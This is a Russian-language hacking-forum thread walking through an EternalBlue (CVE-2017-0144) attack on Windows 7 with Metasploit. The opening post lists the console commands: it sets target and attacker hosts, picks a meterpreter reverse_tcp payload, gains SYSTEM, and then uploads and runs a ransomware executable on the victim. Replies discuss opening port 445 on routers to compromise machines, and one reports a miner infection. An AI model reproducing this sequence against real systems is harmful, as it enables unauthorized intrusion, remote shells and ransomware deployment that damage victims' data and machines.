EternalBlue - Взлом Windows PC

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

lolik228

Участник

lolik228

Участник
2 Фев 2017
448
101
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Всем привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.

16d4c0c6ec500b27ecfef16388beeb7f.png

В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.

Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.

Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

> msfupdate

c4e6eabfc2040c6af8b98712991855d9.png

> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105

> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

> msf exploit(ms17_010_eternalblue) >exploit

44c0885d18083405b3ffe15c468cbe23.png

Эксплоит срабатывает на отлично, получаем системные привилегии:

> getsystem

> getuid

ac4440acfb93861f87c6c8939d54ab83.png

Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)

f818447e5608f13279f7ca1d56bc24e6.png

> upload /root/ransomware.exe C:\\

> shell

> cd C:\\

> ransomware.exe

a1ce22c0184c01ce7b92aaaa2834d2a4.png


И как итог:

56995404f633f4da18acc1bce1be2ede.png

Вот собственно, и все. Спасибо за внимание.
 
  • Лайк
Reactions: BadZ

BadZ

VIP

BadZ

VIP
18 Мар 2017
155
72
Жаль что эксплоит не полный, работает только на Win7 x64.
 

Barber75

Участник

Barber75

Участник
4 Авг 2017
3
0
Я так понимаю что smb по умолчанию включен и нужно лишь открыть 445 порт, я правильно понимаю? то есть если есть доступ к 10 роутерам то полюбому один комп получится взломать если прописать в nat правило на 445 порт
 

Chipzel

Участник

Chipzel

Участник
25 Сен 2017
10
0
Словил через этот эксплоит майнер. При удалении каждый раз загружался заново. Вылечил блокировкой 445 порта и обновлением Винды
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя